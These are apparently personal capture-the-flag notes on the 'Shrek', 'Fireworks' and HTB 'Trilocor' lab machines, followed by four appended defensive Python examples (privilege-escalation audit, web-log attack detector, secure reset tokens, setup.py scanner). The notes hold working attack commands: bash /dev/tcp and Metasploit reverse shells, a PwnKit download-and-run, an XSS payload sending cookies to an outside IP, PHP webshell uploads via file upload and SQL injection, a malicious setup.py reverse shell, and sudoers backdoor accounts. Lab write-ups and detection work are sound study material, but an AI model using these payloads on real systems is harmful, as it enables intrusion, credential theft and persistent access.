# King of the hill

## [Shrek machine](https://www.youtube.com/watch?v=QsimLG1oZjo)

- Target: 10.10.237.146
- `ping -c 3 target` -> check that the host is up
- `nmap -sC -sV -oN map.txt target` -> recon for open ports and directories
- `echo .... | base64 -d` -> decode base64
- `chmod 600 id_rsa` -> `ssh -i id_rsa username@target` -> SSH in once the private key is known
- `skipper --dirhttp target | bash` -> recon
- `curl target:port` -> check a port

```code=
sudo service openvpn restart
sudo pkill openvpn
sudo service networking restart
sudo openvpn user.ovpn
```
=> restart the VPN

```code=
find / -perm -u=s -type f 2>/dev/null
nano binary-escalation      -> look for something to escalate with
/usr/bin/gdb                -> escalate
https://gtfobins.github.io/
./gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
id
```
=> escalate with gdb once RCE is obtained

```code=
wget http://Your-ip
python3 -m http.server
```
=> pull files onto the victim machine with wget

```code=
uname -a
echo "msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=yourIP LPORT=yourPort -f elf > shell.elf" > backdoor
msfconsole
use multi/handler
set lhost tun0
set option exploit
set PAYLOAD php/meterpreter/reverse_tcp
run
```
=> reverse shell with Metasploit

- `wget http://Your-ip/shell.elf`
- `chmod +x shell.elf`
- `./shell.elf &`
- `cd /` -> `cd root` -> `cat root.txt` -> not escalated yet
- `find / | grep flag.txt`
- `which python3` -> create a reverse shell
- `echo '<?php system($_GET["cmd"]); ?> ' > shell.php`
- `nc -lnvp 9001`
- ![image](https://hackmd.io/_uploads/rk-hiMTRlg.png) -> paste `?cmd=`
- `https://github.com/ly4k/PwnKit` -> `curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit || exit` -> `chmod +x PwnKit` -> `./PwnKit` -> RCE
- `adduser ams`
- `passwd ams`
- `vim /etc/sudoers`
- ![image](https://hackmd.io/_uploads/SJmaCG6Rlg.png)
- `sudo su`
- `vim /etc/ssh/sshd_config`
- ![image](https://hackmd.io/_uploads/r1jNJ7pClg.png)
- ![image](https://hackmd.io/_uploads/BJ5DkQ6Axg.png)
- `systemctl restart sshd`
- ![image](https://hackmd.io/_uploads/rk9hyQTCgg.png)
- ![image](https://hackmd.io/_uploads/SkgdjlCRex.png)
- shrek: ssh
- geo: 9999
- ![image](https://hackmd.io/_uploads/rk0XseAAle.png)
- Donkey: Python reverse shell -> PwnKit to root

## [Fireworks machine](https://www.youtube.com/watch?v=1ypi7mqCfXo)

- `threader 3000` -> port scan
- `ftp target` -> `get abc.txt`

```code=
ssh2john id_rsa > forjohn
john forjohn
john forjohn --show
```
=> crack the key passphrase

```code=
nano
^R^X
reset; sh 1>&0 2>&0
```
=> [spawn a new shell when the current one is restricted](https://gtfobins.github.io/gtfobins/nano/) => shell obtained

`sudo -l` -> shows NOPASSWD for `/usr/bin/nmap`

```code=
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
nmap --script=$TF
```

```code=
echo 'h00dy' > king.txt
chattr +i king.txt
```
=> sets the immutable attribute: even root cannot change the file until the attribute is removed

```code=
whatweb http://12.3.3.4
searchsploit <result just found>
```

```code=
sqlmap -r sql.txt --dbs --threads 10                                          -> find the injection
sqlmap -r sql.txt -D mgs_db --tables --threads 10 --batch                     -> find the tables
sqlmap -r sql.txt -D mgs_db -T users --dump --threads 10 --batch              -> users
```
[cracking passwords](https://crackstation.net/)

- look at URLs like `user/list` -> `/etc/passwd` -> `/usr/bin/fireshell`

```code=
docker ps
docker exec -it id bash
```
[look here for PoCs](https://www.vicarius.io/vsociety/)
[CVE used in this box](https://www.vicarius.io/vsociety/posts/xwiki-rce-cve-2024-31982)

```code=
/bin/bash -c '/bin/bash -i >& /dev/tcp/attacker-ip/1337 0>&1'
chmod +x void.sh
up 80
nc -lnvp 1337
python3 xwiki_rce.py -u "http:...." -c 'curl atk_ip/void.sh -o void.sh'
python3 xwiki_rce.py -u "http:...." -c 'bash void.sh'
```
=> plant the shell

```code=
chmod 600 id_rsa
ssh -i id_rsa thomas@target
```

```code=
find . -name 'id_rsa' 2>/dev/null
```

```code=
su david
```

```code=
shell id
nc -lnvp 1337
shell bash -c 'bash -i >& /dev/tcp/atk_ip/1337 0>&1'
```

## Trilocor robotic - HTB

- XSS
  - `<img src=x onerror="this.src='http://10.10.14.3:8000/cookie?c='+document.cookie">`
  - `python -m http.server`
  - `ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://www.trilocor.local/ -H 'Host: FUZZ.trilocor.local' -t 20 -fw 5194,1`
- File upload (Elementor v3.7.7)
  - `action=elementor_library_direct_actions&_nonce=444650fd84&library_action=import_template&fileData=PD9waHAgZWNobyBpc3NldCgkX0dFVFsnY21kJ10pID8gc2hlbGxfZXhlYygkX0dFVFsnY21kJ10pIDogbnVsbDsgPz4K&fileName=/../payload.php`
  - `http://admin.trilocor.local/wp-content/uploads/elementor/tmp/payload.php?cmd=cat%20/etc/passwd`
- SQLi
  - `http://www.trilocor.local:8088/index.php?username=hr-smith'+OR+'1'='1&password=hr-smit`
- LFI
  - change the HTTP method
  - `ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http://www.trilocor.local:8088/dashboard.php -X POST -d "language=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -H "Cookie: PHPSESSID=f0u8vq154fpnlj8e8pchhq2d57" -fs 3018,3035`

```code=
http://www.trilocor.local:8088/index.php?username=hr-smith'+OR+'<?=`ls`?>'!='1&password=hr-smitth
```

- `....// ....// ....//var/lib/php/sessions/sess_<session_id>` -> read the `ls` output from the session file
- Weak password reset token
  - `seq -w 0000 9999 > tokens.txt`
  - `ffuf -w tokens.txt -request req.txt -request-proto http -u http://www.trilocor.local:8080/reset.php -fs 4568`
- SQLi
  - `sqlmap -u "http://www.trilocor.local:8080/resumes.php?search=r.batty" --cookie="PHPSESSID=5oo04rk4eovu3k3e30pu7qop0u" --batch --level=5 --risk=3`
  - `http://www.trilocor.local:8080/resumes.php?search='+UNION+SELECT+'1','2','3','4','5','6`
  - `http://www.trilocor.local:8080/resumes.php?search='+UNION+SELECT+NULL,NULL,variable_name,variable_value,NULL,'3'+FROM+information_schema.global_variables+where+variable_name%3d"secure_file_priv"--+` -> read `secure_file_priv` to see whether file reads/writes are restricted
  - `http://www.trilocor.local:8080/resumes.php?search='+UNION+SELECT+'IceKing+Write+File',NULL,'1','2',NULL,''+INTO+OUTFILE+'/tmp/test.txt` -> write a file
  - `http://www.trilocor.local:8080/resumes.php?search='+UNION+SELECT+NULL,NULL,'1',2,NULL,LOAD_FILE('/tmp/test.txt')%3b--+` -> read a file
  - `ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt -u "http://www.trilocor.local:8080/resumes.php?search='+UNION+SELECT+NULL,NULL,'1',2,NULL,LOAD_FILE('FUZZ')%3b--+" -H "Cookie: PHPSESSID=5oo04rk4eovu3k3e30pu7qop0u" -fs 3176`
  - `http://www.trilocor.local:8080/resumes.php?search='+UNION+SELECT+NULL,NULL,'1',2,NULL,(SELECT+LOAD_FILE('/etc/apache2/httpd.conf'))%3b--+`
  - `http://www.trilocor.local:8080/resumes.php?search='+UNION+SELECT+'<%3fphp+system($_REQUEST[0])%3b+%3f>',NULL,'1','2',NULL,''+INTO+OUTFILE+'/var/www/public/shell.php` -> upload a webshell
- SSRF

```code=
mkdir evilpkg
cd evilpkg

# setup.py
from setuptools import setup
import os
os.system("bash -c 'bash -i >& /dev/tcp/10.10.14.22/4444 0>&1'")
setup(
    name="evilpkg",
    version="0.1",
    description="Malicious package",
    packages=["evilpkg"],
)

# back in the shell
echo "" > __init__.py
cd ..
tar -czf evilpkg-0.1.tar.gz *

[us-academy-exams-1]-[10.10.14.22]-[htb-ac-852867@htb-3aeykq8h7q]-[~] [*]$ nc -lvnp 4444
listening on [any] 4444 ...
```

- ![image](https://hackmd.io/_uploads/rJuPHSJ1Wx.png)
- `nc -lvnp 4444`
- `sudo ufw status verbose` -> which ports are allowed through the firewall
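The Shrek and Fireworks boxes both fall to the same class of misconfiguration: a SUID binary (gdb) or a NOPASSWD sudo rule (nmap) on a tool that can spawn a shell. The script below is an added example, not part of these notes, showing how a defender audits a host for that condition: it diffs a `find / -perm -u=s -type f` listing against a known-good baseline and flags NOPASSWD sudo entries whose command is a shell-capable binary. The baseline set, the shell-capable set and both input listings are constructed for the demo; a real baseline is captured from a clean image of the same distribution.

```python
"""Audit SUID binaries and sudoers NOPASSWD rules against a baseline.

Added example (not part of the original notes). Inputs are a constructed
`find / -perm -u=s -type f` listing and constructed `sudo -l` output; the
baseline and shell-capable sets are assumptions for the demo.
"""
import os

# SUID binaries expected on a stock install (assumption for this demo;
# capture the real baseline from a clean host of the same distro).
BASELINE_SUID = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/lib/openssh/ssh-keysign",
}

# Tools that can spawn an interactive shell or run arbitrary code. Any of
# these with SUID or NOPASSWD sudo is a privilege-escalation path (the notes
# above abuse gdb, nmap and nano exactly this way).
SHELL_CAPABLE = {"gdb", "nmap", "nano", "vim", "vi", "python", "python3",
                 "perl", "ruby", "bash", "sh", "find", "less", "more", "awk"}

# Constructed sample output of: find / -perm -u=s -type f 2>/dev/null
CONSTRUCTED_FIND_OUTPUT = """\
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/su
/usr/bin/gdb
/usr/bin/mount
/usr/local/bin/pkexec
"""

# Constructed sample output of: sudo -l
CONSTRUCTED_SUDO_L = """\
User fireworks may run the following commands on fireworks:
    (ALL) NOPASSWD: /usr/bin/nmap
    (root) /usr/bin/systemctl restart apache2
"""


def audit_suid(find_output, baseline=BASELINE_SUID):
    """Return [(path, reason)] for SUID files outside the baseline.

    reason is 'shell-capable' when the binary is a known shell spawner,
    otherwise 'not-in-baseline' (unexpected SUID file, investigate).
    """
    findings = []
    for line in find_output.splitlines():
        path = line.strip()
        if not path or path in baseline:
            continue
        name = os.path.basename(path)
        reason = "shell-capable" if name in SHELL_CAPABLE else "not-in-baseline"
        findings.append((path, reason))
    return findings


def audit_sudo_rules(sudo_l_output):
    """Return [(binary, reason)] for NOPASSWD rules on shell-capable binaries."""
    findings = []
    for line in sudo_l_output.splitlines():
        line = line.strip()
        if "NOPASSWD:" not in line:
            continue
        # everything after NOPASSWD: is a comma-separated command list
        for cmd in line.split("NOPASSWD:", 1)[1].split(","):
            cmd = cmd.strip()
            if not cmd:
                continue
            binary = cmd.split()[0]
            if os.path.basename(binary) in SHELL_CAPABLE:
                findings.append((binary, "nopasswd-shell-capable"))
    return findings


if __name__ == "__main__":
    for finding in audit_suid(CONSTRUCTED_FIND_OUTPUT) + audit_sudo_rules(CONSTRUCTED_SUDO_L):
        print("%-30s %s" % finding)
```

On a real host, feed the script the live `find` and `sudo -l` output and treat every `shell-capable` or `nopasswd-shell-capable` hit as a must-fix: remove the SUID bit (`chmod u-s`) or replace the sudo rule with one that names a non-interactive wrapper script.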
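The Shrek webshell (`shell.php?cmd=`) and the Trilocor XSS, `UNION SELECT` / `LOAD_FILE` / `INTO OUTFILE` injections and `....//` traversal all leave distinctive strings in the web server's access log. The detector below is an added example, not part of these notes: it parses combined-format log lines, URL-decodes the request target and tags each request with the attack patterns it matches. The log lines are constructed to mirror the requests recorded above; the rule list is an assumption for the demo and not a complete signature set.

```python
"""Tag web requests that match the attack patterns recorded in these notes.

Added example, not part of the original notes. The access-log lines are
constructed; the rules are derived from the requests above (`?cmd=`
webshells, UNION/LOAD_FILE/INTO OUTFILE SQLi, tautology logins,
onerror/document.cookie XSS, path traversal, PHP tags in parameters).
"""
import re
from urllib.parse import unquote_plus

# (tag, regex applied to the URL-decoded request target)
RULES = [
    ("webshell-cmd",   re.compile(r"[?&]cmd=", re.I)),
    ("sqli-union",     re.compile(r"\bunion\b.{0,40}\bselect\b", re.I)),
    ("sqli-file",      re.compile(r"\b(load_file|into\s+outfile)\b", re.I)),
    ("sqli-tautology", re.compile(r"'\s*or\s*'", re.I)),
    ("xss-cookie",     re.compile(r"onerror\s*=|document\.cookie", re.I)),
    ("lfi-traversal",  re.compile(r"\.\./|/etc/passwd", re.I)),
    ("php-tag",        re.compile(r"<\?(php|=)", re.I)),
]

# Apache/nginx combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log, modelled on the requests in the notes above.
CONSTRUCTED_LOG = """\
10.0.0.5 - - [01/Jan/2025:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2025:10:00:02 +0000] "GET /shell.php?cmd=id HTTP/1.1" 200 98
10.0.0.9 - - [01/Jan/2025:10:00:03 +0000] "GET /resumes.php?search=%27+UNION+SELECT+NULL,NULL,%271%27,2,NULL,LOAD_FILE(%27/etc/passwd%27)%3b--+ HTTP/1.1" 200 3176
10.0.0.9 - - [01/Jan/2025:10:00:04 +0000] "GET /index.php?username=hr-smith%27+OR+%27%3C%3F%3D%60ls%60%3F%3E%27!%3D%271&password=x HTTP/1.1" 200 3018
10.0.0.9 - - [01/Jan/2025:10:00:05 +0000] "POST /dashboard.php HTTP/1.1" 200 3035
10.0.0.7 - - [01/Jan/2025:10:00:06 +0000] "GET /comment?text=%3Cimg+src%3Dx+onerror%3D%22this.src%3D%27http://evil/c%3F%27%2Bdocument.cookie%22%3E HTTP/1.1" 200 1
"""


def classify_request(target):
    """Return the sorted list of tags whose pattern matches the decoded target."""
    decoded = unquote_plus(target)
    # decode a second time: double-encoding is a common filter-evasion trick
    decoded = unquote_plus(decoded)
    return sorted(tag for tag, rx in RULES if rx.search(decoded))


def scan_log(text):
    """Return [(line_number, client_ip, tags)] for every tagged request."""
    hits = []
    for number, line in enumerate(text.splitlines(), 1):
        match = LOG_RE.match(line)
        if not match:
            continue
        tags = classify_request(match.group("target"))
        if tags:
            hits.append((number, match.group("ip"), tags))
    return hits


if __name__ == "__main__":
    for number, ip, tags in scan_log(CONSTRUCTED_LOG):
        print("line %d from %s: %s" % (number, ip, ", ".join(tags)))
```

Note the gap this shows as much as the hits: the POST-body LFI (`language=....//`) from the notes produces a clean-looking `POST /dashboard.php` line, because access logs do not record request bodies. Catching that class needs a WAF or application-level logging of the parameter, not the access log.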
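The Trilocor reset token is a four-digit number, so `seq -w 0000 9999` enumerates the whole space in at most 10,000 requests. The class below is an added example, not part of these notes, showing the fix on the server side: a 256-bit random token stored only as a hash, valid for a limited time, redeemable once, compared in constant time, and burned after a few wrong guesses. The clock is injectable so the expiry path can be exercised offline; the TTL and attempt limit are assumptions for the demo.

```python
"""Password-reset tokens that cannot be enumerated with `seq 0000 9999`.

Added example, not part of the original notes. Mitigation for the weak
reset token above: 32 random bytes, hash-only storage, expiry, single use,
constant-time comparison and a per-token wrong-guess limit.
"""
import hashlib
import hmac
import secrets
import time

TOKEN_BYTES = 32            # 256 bits of entropy (assumed policy for the demo)
TOKEN_TTL_SECONDS = 15 * 60  # token lifetime (assumed)
MAX_ATTEMPTS = 5             # wrong guesses before the token is burned (assumed)


def _digest(token):
    """Store only a hash so a database leak does not expose live tokens."""
    return hashlib.sha256(token.encode()).hexdigest()


class ResetTokenStore:
    def __init__(self, clock=time.time):
        self._clock = clock
        self._pending = {}  # user -> [token_hash, expires_at, wrong_attempts]

    def issue(self, user):
        """Create a token for `user`, replacing any earlier one.

        Returns the plaintext token to send to the user; only its hash is kept.
        """
        token = secrets.token_urlsafe(TOKEN_BYTES)
        self._pending[user] = [_digest(token), self._clock() + TOKEN_TTL_SECONDS, 0]
        return token

    def redeem(self, user, presented):
        """Return True exactly once, for the correct and unexpired token."""
        entry = self._pending.get(user)
        if entry is None:
            return False
        token_hash, expires_at, _ = entry
        if self._clock() > expires_at:
            del self._pending[user]
            return False
        # constant-time compare: no timing side channel on the prefix
        if not hmac.compare_digest(token_hash, _digest(presented)):
            entry[2] += 1
            if entry[2] >= MAX_ATTEMPTS:
                del self._pending[user]  # burn it; the user must request again
            return False
        del self._pending[user]  # single use
        return True


if __name__ == "__main__":
    store = ResetTokenStore()
    token = store.issue("alice")
    print("guess 0000 accepted:", store.redeem("alice", "0000"))
    print("real token accepted:", store.redeem("alice", token))
    print("replay accepted:    ", store.redeem("alice", token))
```

The `ffuf` filter in the notes works because every wrong guess returns the same page and the endpoint never locks; with the attempt counter above, the fifth wrong guess invalidates the token, so the brute-force loop cannot make progress even against a short token, and the 256-bit token makes the space unenumerable regardless.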
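The `evilpkg` tarball above works because `pip install` executes `setup.py`, so a module-level `os.system(...)` runs with the installing user's privileges before `setup()` is even called. The checker below is an added example, not part of these notes: it parses a `setup.py` with the `ast` module (never importing or executing it) and reports calls that run commands, spawn processes or open sockets. The two `setup.py` texts are constructed, one mirroring the package in the notes; the suspicious-call list is an assumption for the demo, not a complete policy.

```python
"""Static check for install-time code execution in a Python source package.

Added example, not part of the original notes. Parses setup.py with `ast`
(no execution) and flags command/process/network calls, which is exactly
what the malicious package above relies on.
"""
import ast

# Fully qualified call names that have no business in a setup.py (assumed list).
SUSPICIOUS_CALLS = {
    "os.system", "os.popen", "os.execl", "os.execv", "os.execvp",
    "subprocess.run", "subprocess.Popen", "subprocess.call",
    "subprocess.check_output", "subprocess.check_call",
    "socket.socket", "urllib.request.urlopen", "exec", "eval",
}

# Constructed: the setup.py from the notes above, minus the description.
EVIL_SETUP = '''
from setuptools import setup
import os
os.system("bash -c 'bash -i >& /dev/tcp/10.10.14.22/4444 0>&1'")
setup(name="evilpkg", version="0.1", packages=["evilpkg"])
'''

# Constructed: a setup.py that only declares metadata.
BENIGN_SETUP = '''
from setuptools import setup
setup(name="goodpkg", version="0.1", packages=["goodpkg"])
'''


def _dotted_name(node):
    """Turn the func node of `a.b.c(...)` into 'a.b.c'; None if not a plain name."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_setup(source):
    """Return sorted [(line, call_name)] for suspicious calls in the source."""
    tree = ast.parse(source)
    findings = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _dotted_name(node.func)
        if name and (name in SUSPICIOUS_CALLS or name.startswith(("os.exec", "os.spawn"))):
            findings.append((node.lineno, name))
    return sorted(findings)


def is_safe_to_install(source):
    """True only when no suspicious call was found (a triage signal, not proof)."""
    return not scan_setup(source)


if __name__ == "__main__":
    for label, src in (("evilpkg", EVIL_SETUP), ("goodpkg", BENIGN_SETUP)):
        print(label, scan_setup(src))
```

This is a triage gate, not a guarantee: `from os import system as s` or a `cmdclass` that shells out inside an `install` subclass slips past a name-based check, so pair it with installing from wheels (which have no `setup.py` to run) and a build sandbox that has no outbound network, which is what would have stopped the reverse connection to port 4444 above.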